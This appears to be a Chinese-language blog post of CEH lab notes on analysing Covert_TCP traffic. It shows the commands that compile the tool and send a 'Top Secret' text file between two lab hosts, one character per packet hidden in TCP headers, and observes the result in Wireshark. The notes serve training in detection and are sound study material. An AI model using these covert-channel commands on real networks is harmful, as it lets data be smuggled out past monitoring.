分析 Covert TCP 網路流量
分析 Covert TCP 網路流量
檔案位於工具包路徑 E:\CEH-Tools\CEHv11 Module 06 System Hacking\Covering Tracks Tools\Covert_TCP 底下
執行指令開始接收訊息
ls 確認檔案存在於 Home 底下,進行編譯
指令 : gcc covert_tcp.c -o covert_tcp
再 ls 一次確認編譯完成檔案存在
指令 : sudo ./covert_tcp -dest 10.10.10.9 -source 10.10.10.13 -dest_port 8008 -source_port 9009 -server -file received.txt
參數 source : 送訊息的主機
參數 dest : 接收訊息的主機
同樣於要傳送訊息的主機 10.10.10.13 執行相同作業將工具進行編譯並確認存在
於接收端同樣可以看到文字訊息檔一個一個傳送過來,傳送完畢後可以 cat 檔案看一下內容
於要傳送訊息的主機建立一個文字檔 send.txt 當中的文字為 [ Top Secret!! ]
於送訊息主機端開啟 WireShark 進行封包抓取,過濾時選擇 TCP 即可
傳送端執行指令開始進行訊息傳送
指令 : sudo ./covert_tcp -source 10.10.10.13 -dest 10.10.10.9 -source_port 8008 -dest_port 9009 -file send.txt
注意這裡 -source、-dest 與前面一樣,但是 Port 的 source & dest 剛好顛倒
執行後可以看到開始傳送文字檔中的訊息如下
開啟 WireShark 可以看到傳送的訊息包在 TCP 封包表頭中,一個封包塞入一個文字慢慢傳送
留言
張貼留言